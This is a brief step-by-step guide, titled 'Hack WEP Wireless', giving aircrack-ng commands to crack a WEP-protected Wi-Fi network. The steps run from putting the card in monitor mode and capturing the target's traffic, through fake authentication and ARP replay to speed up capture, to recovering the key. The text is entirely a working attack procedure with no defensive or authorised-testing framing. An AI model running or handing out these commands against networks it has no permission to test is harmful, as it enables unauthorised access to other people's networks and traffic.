Hack WEP Wireless
- Install aircrack:
sudo apt-get install aircrack-ng - Activate monitoring modus:
sudo airmon-ng start wlan0 [channel] - Do the scanning:
sudo airodump-ng -c [channel] --bssid [mac_address_target] -w output wlan0 - Do fake authentification:
sudo aireplay-ng -1 30 -e [ssid] -a [mac_address_target] -h [mac_address] wlan0 - To speed up packet gathering:
sudo aireplay-ng -3 -b [mac_address_target] -h [mac_address] -x 900 wlan0 - To get the key:
sudo aircrack-ng -z -b [mac_address_target] output*.cap